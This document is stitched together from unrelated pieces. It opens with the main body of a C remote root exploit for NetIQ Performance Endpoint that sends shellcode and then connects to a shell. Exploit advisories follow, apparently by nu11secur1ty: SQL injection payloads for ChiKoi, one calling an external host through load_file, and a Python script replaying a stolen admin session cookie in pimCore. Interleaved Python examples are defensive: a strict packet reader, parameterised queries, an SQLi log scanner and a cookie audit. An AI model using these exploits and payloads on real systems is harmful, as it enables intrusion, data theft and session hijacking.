      if (FD_ISSET (fd, &rset))
        {
          if ((n = sock_recv_str (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
            {
              fprintf (stderr, "Connection closed by foreign host.\n");
              exit (EXIT_SUCCESS);
            }
          printf ("%s", rbuf);
          fflush (stdout);
        }

      if (FD_ISSET (STDIN_FILENO, &rset))
        {
          if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
            {
              rbuf[n] = '\0';
              sock_send (fd, rbuf, n);
            }
        }
    }
}

static int
sockami (char *host, int port)
{
  struct sockaddr_in address;
  struct hostent *hp;
  int fd;

  fflush (stdout);

  if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
    {
      perror ("socket()");
      exit (EXIT_FAILURE);
    }

  if ((hp = gethostbyname (host)) == NULL)
    {
      perror ("gethostbyname()");
      exit (EXIT_FAILURE);
    }

  memset (&address, 0, sizeof (address));
  memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
  address.sin_family = AF_INET;
  address.sin_port = htons (port);

  if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
    {
      perror ("connect()");
      return (-1);
    }

  return (fd);
}

int
endpt_add_string (char *buf, char *str)
{
  unsigned int str_len;
  unsigned short str_lens;

  assert (buf != NULL && str != NULL);

  str_len = 2 + strlen (str) + 1;
  str_lens = htons (str_len);

  /* add the string length and copy, including NULL */
  *((unsigned short *) buf) = str_lens;
  memcpy (buf + 2, str, str_len - 2);

  return (str_len);
}

char *
endpt_read_packet (int fd, char *buf)
{
  unsigned short pkt_len;
  int n;

  n = sock_recv (fd, (char *) &pkt_len, sizeof pkt_len);
  if (n < 2)
    {
      fprintf (stderr, "endpt_read_packet: failed reading length!\n");
      return (NULL);
    }

  pkt_len = ntohs (pkt_len);
  if (pkt_len > ENDPT_PKTMAX)
    {
      fprintf (stderr, "endpt_read_packet: invalid packet length!\n");
      return (NULL);
    }

  n = sock_recv (fd, buf, pkt_len - 2);
  if (n < pkt_len - 2)
    {
      fprintf (stderr, "endpt_read_packet: failed reading packet (%d read, need %d)!\n", n, pkt_len);
      return (NULL);
    }

  return (buf);
}

char *
endpt_create_packet (char *buf, unsigned int len)
{
  char *pkt_buf;
  unsigned int pkt_len;
  unsigned short pkt_lens;

  assert (buf != NULL && len > 0);
  assert (len <= UINT_MAX - 2);
  assert (len <= ENDPT_PKTMAX - 2);

  pkt_len = 2 + len;
  pkt_buf = malloc (pkt_len * sizeof (char));
  if (pkt_buf == NULL)
    return (NULL);

  pkt_lens = htons (pkt_len);

  /* add the packet length and copy */
  *((unsigned short *) pkt_buf) = pkt_lens;
  memcpy (pkt_buf + 2, buf, len);

  return (pkt_buf);
}

void
endpt_listen_child (char *thost, struct target_t *trgt)
{
  struct sockaddr_in servaddr, cliaddr;
  char pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
  unsigned int var_30_ptr;
  int lfd, cfd, sfd, pid;
  socklen_t clilen;

  sleep (1);
  pid = getpid ();

  if ((lfd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
      perror ("socket()");
      fatal ();
    }

  memset (&servaddr, 0, sizeof servaddr);
  servaddr.sin_family = AF_INET;
  servaddr.sin_addr.s_addr = htonl (INADDR_ANY);
  servaddr.sin_port = htons (ENDPT_TCP_PORT);

  if (bind (lfd, (struct sockaddr *) &servaddr, sizeof servaddr) < 0)
    {
      perror ("bind()");
      fatal ();
    }

  if (listen (lfd, 2) < 0)
    {
      perror ("listen()");
      fatal ();
    }

  clilen = sizeof cliaddr;
  if ((cfd = accept (lfd, (struct sockaddr *) &cliaddr, &clilen)) < 0)
    {
      perror ("accept()");
      fatal ();
    }

  printf ("[child-%d] connection accepted from %s:%d\n",
          pid, inet_ntoa (cliaddr.sin_addr), ntohs (cliaddr.sin_port));

  printf ("[child-%d] reading first packet...", pid);
  /* read dummy packet */
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  printf ("done\n");

  printf ("[child-%d] sending first reply...", pid);
  pkt_ptr = endpt_create_packet (cpkt_buf1, sizeof cpkt_buf1 - 1);
  sock_send (cfd, pkt_ptr, (sizeof cpkt_buf1 - 1) + 2);
  free (pkt_ptr);
  printf ("done\n");

  printf ("[child-%d] reading second packet...", pid);
  /* read dummy packet */
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  printf ("done\n");

  printf ("[child-%d] reading third packet...", pid);
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
  printf ("done\n");

  printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);
  memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);

  printf ("[child-%d] reading fourth packet...", pid);
  /* read dummy packet */
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  printf ("done\n");

  printf ("[child-%d] reading fifth packet...", pid);
  if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
    {
      close (cfd);
      fatal ();
    }
  memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
  printf ("done\n");

  printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);
  memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);

  printf ("[child-%d] sending second reply...", pid);
  pkt_ptr = endpt_create_packet (cpkt_buf2, sizeof cpkt_buf2 - 1);
  sock_send (cfd, pkt_ptr, (sizeof cpkt_buf2 - 1) + 2);
  free (pkt_ptr);
  printf ("done\n");

  printf ("[child-%d] sending evil buffer...", pid);
  ptr = pkt_buf;
  if (trgt->arch == ARCH_X86)
    {
      memcpy (ptr, x86_evil_len, sizeof x86_evil_len);
      ptr += sizeof x86_evil_len - 1;
      memset (ptr, X86_NOP_BYTE, 0x11c0 - 2);
    }
  else if (trgt->arch == ARCH_SPARC)
    {
      int i;

      for (i = 0; i < 2; i++, ptr += sizeof sparc_evil_len - 1)
        memcpy (ptr, sparc_evil_len, sizeof sparc_evil_len);
      for (i = 0; i < 80; i++, ptr += sizeof sparc_nop - 1)
        memcpy (ptr, sparc_nop, sizeof sparc_nop);
    }
  else
    {
      fprintf (stderr, "opps\n");
      exit (EXIT_FAILURE);
    }
  memcpy (&pkt_buf[256], trgt->zshell, trgt->zshell_len - 1);
  sock_send (cfd, pkt_buf, trgt->zshell_pkt_len);
  printf ("done\n");

  printf ("[child-%d] sending hammer buffer...", pid);
  ptr = pkt_buf;
  memcpy (ptr, hammer_buf, sizeof hammer_buf);
  memcpy (&pkt_buf[5], &var_30_ptr, sizeof var_30_ptr);

  if (trgt->arch == ARCH_SPARC)
    var_30_ptr = ntohl (var_30_ptr);
  var_30_ptr -= trgt->fp_offset - 0x08;
  if (trgt->arch == ARCH_SPARC)
    var_30_ptr = htonl (var_30_ptr);

  memcpy (&pkt_buf[trgt->fp_indx], &var_30_ptr, sizeof var_30_ptr);
  sock_send (cfd, pkt_buf, sizeof hammer_buf - 1);
  printf ("done\n");

  printf ("[child-%d] waiting for the shellcode to be executed...\n", pid);
  sleep (3);

  if ((sfd = sockami (thost, PORT_SHELL)) != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (sfd);
    }

  sleep (1);
  close (cfd);
}

void
endpt_parent (char *thost)
{
  struct in_addr ip_addr;
  char ip_buf[IPV4_BUFLEN], pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
  int fd;

  get_localip_getifaddrs (&ip_addr.s_addr);
  strncpy (ip_buf, inet_ntoa (ip_addr), sizeof ip_buf);
  ip_buf[sizeof ip_buf - 1] = '\0';

  if (verbose)
    fprintf (stderr, "[parent-%d] source address %s\n", ppid, ip_buf);
  fflush (stdout);

  printf ("[parent-%d] connecting to %s:%d...", ppid, thost, ENDPT_TCP_PORT);
  if ((fd = sockami (thost, ENDPT_TCP_PORT)) < 0)
    fatal ();
  printf ("done\n");

  printf ("[parent-%d] building first packet...", ppid);
  ptr = pkt_buf;
  memcpy (ptr, ppkt_buf1, sizeof ppkt_buf1);
  ptr += sizeof ppkt_buf1 - 1;
  /* add the connect-back IP */
  ptr += endpt_add_string (ptr, ip_buf);
  memcpy (ptr, ppkt_buf1_end, sizeof ppkt_buf1_end);
  ptr += sizeof ppkt_buf1_end - 1;
  pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
  printf ("done\n");

  sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
  free (pkt_ptr);

  printf ("[parent-%d] building second packet...", ppid);
  ptr = pkt_buf;
  memcpy (ptr, ppkt_buf2, sizeof ppkt_buf2);
  ptr += sizeof ppkt_buf2 - 1;
  /* add the connect-back IP */
  ptr += endpt_add_string (ptr, ip_buf);
  memcpy (ptr, ppkt_buf2_end, sizeof ppkt_buf2_end);
  ptr += sizeof ppkt_buf2_end - 1;
  pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
  printf ("done\n");

  sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);

  printf ("[parent-%d] building third packet...done\n", ppid);
  sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
  free (pkt_ptr);

  sleep (2);
  printf ("[parent-%d] closing socket...done\n", ppid);
  close (fd);
}

int
main (int argc, char **argv)
{
  struct target_t *trgt;
  int i, cret;

  printf ("NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");

  if (argc <= 2)
    {
      fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
      for (i = 0; targets[i].name; i++)
        fprintf (stderr, "\t%d) %s\n", i, targets[i].name);
      fprintf (stderr, "\n");
      exit (EXIT_SUCCESS);
    }

  if (atoi (argv[2]) >= NUM_TARGETS)
    {
      fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
      exit (EXIT_SUCCESS);
    }

  trgt = &targets[atoi (argv[2])];
  printf ("Target: %s\n\n", trgt->name);

  srand (time (NULL));
  printf ("%s\n\t- https://tinyurl.com/lgmblyj\n\n", quotes[rand() & 1]);

  ppid = getpid ();
  if ((cpid = fork ()) < 0)
    {
      perror ("fark()");
      exit (EXIT_FAILURE);
    }
  else if (cpid == 0)
    {
      /* child */
      endpt_listen_child (argv[1], trgt);
      exit (EXIT_SUCCESS);
    }

  /* parent */
  endpt_parent (argv[1]);

  /* wait for child */
  wait (&cret);
  if (verbose)
    fprintf (stderr, "[parent-%d] child-%d exited %d\n", ppid, cpid, cret);

  return (EXIT_SUCCESS);
}
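The packet framing the helpers above write is simple: `endpt_create_packet` prefixes a body with a 2-byte big-endian length that counts itself, and `endpt_add_string` encodes each string field as a 2-byte big-endian length (2 + text + 1) followed by the text and a NUL, which is why the exploit's constant fields read `"\x00\x03" "\x00"`. The "evil buffer" is a 0x11c0-byte packet whose length prefix doubles as the first instruction, so the defect class being hit is a receiver that trusts a declared length and copies into a fixed buffer. The reader below is an added example written in Python for this page, not part of mu-b's exploit; it encodes exactly the layout the C helpers produce and rejects every length that does not fit the data or the receiving buffer. The receiver ceiling `RECV_PKTMAX` and the 0x40 string ceiling are assumptions (the exploit names an `ENDPT_PKTMAX` macro whose value is not on the page, and its comments say `len < 0x40`).

```python
"""Strict reader for the length-prefixed framing used by the exploit above.

Added example; not part of the original code. Encoding follows
endpt_create_packet() and endpt_add_string():
  packet : 2-byte big-endian length that counts itself, then length-2 bytes
  string : 2-byte big-endian length = 2 + len(text) + 1, the text, one NUL
"""
import struct

RECV_PKTMAX = 0x800     # assumption: this receiver's own packet ceiling
MAX_STRING_LEN = 0x40   # assumption: the "len < 0x40" limit from the comments


class FramingError(ValueError):
    """Raised for any declared length that does not fit the data or buffers."""


def encode_string(text):
    """Same layout endpt_add_string() writes: BE length (2+len+1), text, NUL."""
    return struct.pack(">H", 2 + len(text) + 1) + text + b"\x00"


def encode_packet(body):
    """Same layout endpt_create_packet() writes: BE length (2+len), body."""
    return struct.pack(">H", 2 + len(body)) + body


def decode_packet(data):
    """Return the body of one packet; reject short, oversized or truncated input."""
    if len(data) < 2:
        raise FramingError("short length header")
    (total,) = struct.unpack(">H", data[:2])
    if total < 2:
        raise FramingError("declared length %d smaller than its own header" % total)
    if total > RECV_PKTMAX:
        raise FramingError("declared length %d exceeds receiver buffer" % total)
    if len(data) < total:
        raise FramingError("truncated: need %d bytes, have %d" % (total, len(data)))
    return data[2:total]


def decode_string(body, offset, max_len=MAX_STRING_LEN):
    """Decode one string field at offset; return (text, next_offset).

    The declared length is checked against the remaining body and against
    the fixed-size buffer the text would be copied into. Skipping the second
    check is the overrun class a length-prefixed protocol exploit relies on.
    """
    if offset + 2 > len(body):
        raise FramingError("string header past end of body")
    (declared,) = struct.unpack(">H", body[offset:offset + 2])
    if declared < 3:
        raise FramingError("string length %d cannot hold header and NUL" % declared)
    text_len = declared - 3
    if text_len >= max_len:
        raise FramingError("string length %d exceeds %d-byte buffer" % (text_len, max_len))
    end = offset + declared
    if end > len(body):
        raise FramingError("string runs past end of body")
    if body[end - 1] != 0:
        raise FramingError("string is not NUL-terminated")
    return body[offset + 2:end - 1], end


def parse_strings(body):
    """Parse a body consisting only of consecutive string fields."""
    fields, offset = [], 0
    while offset < len(body):
        text, offset = decode_string(body, offset)
        fields.append(text)
    return fields


def rejects(func, *args):
    """True when func(*args) raises FramingError; used for self-checks."""
    try:
        func(*args)
    except FramingError:
        return True
    return False
```

`encode_string(b"")` yields `b"\x00\x03\x00"`, the same three bytes the exploit's constant fields carry, and a packet declaring the exploit's 0x11c0 length is rejected before any copy happens.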
## Title: ChiKoi-1.0 SQLi
## Author: nu11secur1ty
## Date: 01.12.2023
## Vendor: https://chikoiquan.tanhongit.com/
## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi
## Description:
The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.
The payload `'+(select load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'`
was submitted in the User-Agent HTTP header.
This payload injects a SQL sub-query that calls MySQL's `load_file`
function with a UNC file path that references a URL on an external
domain.
An attacker can steal all information from this system and can
seriously harm its users, for example by extracting the bank accounts
through which they pay each other.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Payload:
```text
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND
9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION
SELECT 6994) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND
(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT
(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR
---
```
[+] Online:
```text
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)
Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND
8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION
SELECT 6426) END))-- -
---
```
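The sqlmap output above shows the shape of the bug: a quote inside the User-Agent value ends the string literal and the rest of the header becomes SQL. As an added example that is not the ChiKoi code (the table layout and the benign request are constructed, and sqlite3 stands in for MySQL so it runs offline), the block below puts the injectable concatenation next to the parameterised form and adds a log-scanning check that flags the sqlmap-style payloads quoted in this advisory.

```python
"""User-Agent logging: injectable concatenation vs. a bound parameter, plus
a header/log scanning check. Added example, not the ChiKoi code."""
import re
import sqlite3

# Boolean-based payload quoted in the advisory (sqlmap output), reused as-is.
ADVISORY_PAYLOAD = (
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) "
    "Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND "
    "8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION "
    "SELECT 6426) END))-- -"
)
# Constructed benign request and a constructed load_file-style probe.
BENIGN_UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (constructed)"
LOADFILE_UA = "'+(select load_file('\\\\\\\\collaborator.example\\\\x'))+'"


def new_db():
    """In-memory visits table standing in for the shop's database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, user_agent TEXT NOT NULL)")
    return conn


def log_visit_vulnerable(conn, user_agent):
    """Header text is spliced into the statement: a quote in the value ends
    the literal and the remainder is parsed as SQL."""
    conn.execute("INSERT INTO visits (user_agent) VALUES ('" + user_agent + "')")


def log_visit_safe(conn, user_agent):
    """Bound parameter: the value travels separately from the SQL text, so
    the same payload is stored as an opaque string."""
    conn.execute("INSERT INTO visits (user_agent) VALUES (?)", (user_agent,))


def record(conn, handler, user_agent):
    """Run one handler; return ('stored', value) or ('error', exception name)."""
    try:
        handler(conn, user_agent)
    except sqlite3.DatabaseError as exc:
        return ("error", type(exc).__name__)
    row = conn.execute(
        "SELECT user_agent FROM visits ORDER BY id DESC LIMIT 1").fetchone()
    return ("stored", row[0])


# Patterns for the shapes seen in the advisory: a quote followed by a SQL
# keyword, CASE WHEN / UNION SELECT probes, load_file(), a trailing comment.
SQLI_PATTERNS = {
    "quote-keyword": re.compile(r"'\s*(?:where|and|or|union|select)\b", re.I),
    "probe": re.compile(r"\b(?:case\s+when|union\s+select)\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "comment": re.compile(r"--\s*\S*\s*$"),
}


def suspicious_user_agent(user_agent):
    """Return the names of the patterns that match; an empty list means clean.

    Intended for scanning access logs or request headers after the fact; it
    is a detection aid, not a replacement for parameterised queries."""
    return [name for name, pat in SQLI_PATTERNS.items() if pat.search(user_agent)]
```

With the advisory's payload the concatenating handler fails with a syntax error (the error-based channel sqlmap reports), while the parameterised handler stores the whole value unchanged.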
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)
## Proof and Exploit:
[href](https://streamable.com/7x69yz)
## Time spent
`01:30:00`
## Writing an exploit
`00:05:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
## Title: Windows 11 10.0.22000 - Backup service Privilege Escalation
## Author: nu11secur1ty
## Date: 01.13.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/software-download/windows11
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752
## Description:
Windows 11 Pro build 10.0.22000 (Build 22000) suffers from a privilege
escalation vulnerability in the Backup service.
An attacker who successfully exploited this vulnerability could gain
SYSTEM privileges and could delete data, including data whose loss
results in the service being unavailable.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752)
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC)
## Proof and Exploit:
[href](https://streamable.com/f2dl3m)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html https://0day.today/
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
## Exploit Title: pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute
## Author: nu11secur1ty
## Date: 01.11.2023
## Vendor: https://pimcore.com/en
## Software: https://packagist.org/packages/pimcore/skeleton
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton
## Description:
The pimCore-5.4.18-skeleton suffers from a Sensitive Cookie with
Improper SameSite Attribute vulnerability: the PHPSESSID cookie's session
management connection requests are not sanitized correctly.
There are no protective changes to the PHPSESSID cookie for each
request; sessions are not validated and the cookie is not changed for
every connection (POST request).
An attacker in the same network can trick the user, the administrator
of this system, and steal his cookie; he can then do very evil things by
using the same session in the name of the already authenticated
administrator, on a couple of PCs with different IPs used by different
machines in that network.
When the attacker steals the cookie, he can manipulate the same
session; for example, he can log out or do very malicious stuff.
This is a very stupid developer's error, and it can be very
dangerous for the owner of the system.
The attack is also possible from an external network!
## STATUS: HIGH Vulnerability
[+] Payload:
```Python
#!/usr/bin/python3
# @nu11secur1ty 2023
import time
from selenium import webdriver

driver = webdriver.Chrome()
print("Give the stolen cookie...\n")
cookie = input()
print("Give the domain or IP of the owner of the cookie...\n")
target = input()
driver.maximize_window()
# open the admin backend, then replay the captured PHPSESSID in this browser
driver.get(target + 'admin/?_dc=1673370965&perspective=')
driver.add_cookie({'name': 'PHPSESSID', 'value': cookie})
print(driver.get_cookie('PHPSESSID'))
# reload with the replayed cookie: the server accepts the copied session
driver.get(target + 'admin/?_dc=1673370965&perspective=')
time.sleep(3)
print("Press any key to stop the exploit...\n")
input()
print("Your PHPSESSID is PWNED")
```
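The PoC works because a copied PHPSESSID is accepted from any browser and the id is never rotated. As an added example that is not pimcore code (the Set-Cookie header values and the session store are constructed), the block below audits a PHPSESSID Set-Cookie header for the Secure, HttpOnly and SameSite attributes and shows the server-side handling the advisory says is missing: the session id is regenerated at login and the session is bound to the client address, so a cookie presented from a different host resolves to no user.

```python
"""Session-cookie audit and session handling with id rotation and client
binding. Added example; the headers and store are constructed, not pimcore."""
import secrets
from http.cookies import SimpleCookie


def audit_session_cookie(set_cookie_value, name="PHPSESSID"):
    """Return the protections missing from one Set-Cookie header value.

    An empty list means Secure, HttpOnly and a restrictive SameSite are all
    present. Without them the cookie can be sent over plaintext, read by
    script, or attached to cross-site requests.
    """
    jar = SimpleCookie()
    jar.load(set_cookie_value)
    if name not in jar:
        return ["%s not set" % name]
    morsel = jar[name]
    missing = []
    if not morsel["secure"]:
        missing.append("Secure")
    if not morsel["httponly"]:
        missing.append("HttpOnly")
    if str(morsel["samesite"]).lower() not in ("lax", "strict"):
        missing.append("SameSite=Lax or Strict")
    return missing


class SessionStore:
    """Minimal server-side store with the two controls a replayed cookie
    should run into: a fresh id at login and a binding to the client."""

    def __init__(self):
        self._sessions = {}

    def start(self, client_ip):
        """Create an anonymous session for a client and return its id."""
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"user": None, "client_ip": client_ip}
        return sid

    def login(self, sid, user, client_ip):
        """Authenticate and rotate the id; returns the new id or None.

        The pre-login id is discarded, so an id captured or planted before
        authentication never turns into an authenticated session.
        """
        data = self._sessions.pop(sid, None)
        if data is None or data["client_ip"] != client_ip:
            return None
        data["user"] = user
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = data
        return new_sid

    def user_for(self, sid, client_ip):
        """Resolve a presented cookie; unknown ids and ids presented from a
        client other than the one that established them yield None."""
        data = self._sessions.get(sid)
        if data is None or data["client_ip"] != client_ip:
            return None
        return data["user"]
```

Binding to the client address is a coarse control (clients behind one NAT share it), which is why the rotation at login and the cookie attributes come first; the binding is the extra check that defeats the "same cookie on several PCs with different IPs" replay the advisory describes.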
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton)
## Reference:
[href](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions)
## Proof and Exploit:
[href](https://streamable.com/lorw8x)
## Time spent
`03:00:00`
## Writing an exploit
`00:25:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>